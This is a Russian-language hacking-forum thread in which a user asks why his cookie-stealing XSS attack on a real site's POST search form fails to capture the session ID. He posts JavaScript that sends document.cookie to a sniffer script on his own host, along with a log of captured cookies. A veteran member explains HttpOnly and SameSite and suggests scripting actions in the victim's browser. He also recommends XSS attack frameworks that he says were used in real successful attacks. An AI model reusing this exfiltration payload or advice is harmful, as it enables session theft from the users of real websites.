HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.05.2021, 19:35
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию

Здравствуйте уважаемые форумчане столкнулся с такой проблемой есть сайт с xss ( другой сайт а не тот про который я писал в другой теме ) в форме поиска.Поиск осушуствляется методом post так вот для перехвата куки создал у себя на хосте файл perehod.html и вставил туда код

Код:
Code:

img = new Image();img.src="http://domain.ru/snif.php?cookie="+document.cookie;" > // это ссылка на снифер для кражи куки

setTimeout('explForm.submit()', 1);
вроде бы всё правильно юзер переходит по ссылке http://domain.ru/perehod.html после нескольких секунд перенаправляет на https://sait.ru/forum/?act=search но куки записываются не полностью нету SESID а только вот это

Код:
Code:
New cookie accept from         at Saturday 22nd of May 2021 07:40:27 PM REFERER: http://domain.ru/perehod.html 
======================
_ym_uid=1618669368878418167; _ym_d=1618669368; _ga=GA1.2.1294811097.1619781555; s_style=simple; s_order=desc
======================
скажите пожалуйста в чем ошибка и как исправить заранее спасибо.
 
Ответить с цитированием

  #2  
Старый 22.05.2021, 20:42
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Скорее всего кука HttpOnly, они "недоступны" JS-y. Так же, возможно, мешает SameSite, так как, по сути, юзается CSRF 2 XSS, и этот момент должен решиться дополнительным запросом с трастового ориджина. Более подробно про параметры кук можно прочитать тут, а про SameSite, в частности, тут.
 
Ответить с цитированием

  #3  
Старый 22.05.2021, 20:48
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию

Цитата:
Сообщение от crlf  
crlf said:

Скорее всего кука HttpOnly, они "недоступны" JS-y. Так же, возможно, мешает SameSite, так как, по сути, юзается CSRF 2 XSS, и этот момент должен решиться дополнительным запросом с трастового ориджина. Более подробно про параметры кук можно прочитать
тут
, а про SameSite, в частности,
тут
.
значить куки достать не получится
 
Ответить с цитированием

  #4  
Старый 22.05.2021, 20:55
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от amanow  
amanow said:

значить куки достать не получится
Можно найти где-то отражение параметров, типа phpinfo и чего-то подобного и отправить себе, но это редкость. Сами куки-то не особо и нужны, XSS позволяет управлять клиентом. Т.е. можно сделать всё что нужно зарание, заложив последовательность действий в скрипт, а браузер жертвы выполнит в момент триггера XSS.
 
Ответить с цитированием

  #5  
Старый 22.05.2021, 21:00
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию

Цитата:
Сообщение от crlf  
crlf said:

Можно найти где-то отражение параметров, типа phpinfo и чего-то подобного и отправить себе, но это редкость. Сами куки-то не особо и нужны, XSS позволяет управлять клиентом. Т.е. можно сделать всё что нужно зарание, заложив последовательность действий в скрипт, а браузер жертвы выполнит в момент триггера XSS.
Можно свами поговорить в лс ?
 
Ответить с цитированием

  #6  
Старый 22.05.2021, 21:02
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию

Цитата:
Сообщение от crlf  
crlf said:

Можно найти где-то отражение параметров, типа phpinfo и чего-то подобного и отправить себе, но это редкость. Сами куки-то не особо и нужны, XSS позволяет управлять клиентом. Т.е. можно сделать всё что нужно зарание, заложив последовательность действий в скрипт, а браузер жертвы выполнит в момент триггера XSS.
я просто пока не особо в этом понимаю но хочу научится может дадите готовый такой скрипт
 
Ответить с цитированием

  #7  
Старый 22.05.2021, 22:34
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от amanow  
amanow said:

Можно свами поговорить в лс ?
Вряд ли смогу помочь с чем-то конкретным, а общие вопросы можно задавать на форуме открыто

Цитата:
Сообщение от amanow  
amanow said:

я просто пока не особо в этом понимаю но хочу научится может дадите готовый такой скрипт
Нет никаких проблем, для того чтобы научиться нужно сделать локальный стенд. Воссоздать приблизительные условия, т.е. поднять несколько виртуальных хостов, установить любую CMS на один из них, добавить туда XSS уязвимость или использовать общеизвестную, и с двух браузеров (атакующий/жертва) пробовать эксплуатировать.

Для автоматической эксплуатации атаки существуют XSS фреймворки, типа BeEF. Но я бы порекомендовал тулзу от нашего МоА мембера @psihoz26 - el Scripto. Которая создавалась как раз для таких случаев и была не раз применена в реальных и, самое главное, успешных атаках. Имеет много готовых пресетов для известных CMS, изучая и используя которые можно слепить свой, админку и кучу решённых подводных камней возникающих при межсайтовом скриптинге.

Как только локально всё получится, то и удалённо будет тоже ок, можно даже не сомневаться, останется только подкорректировать данные и урлы под требуемый кейс.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ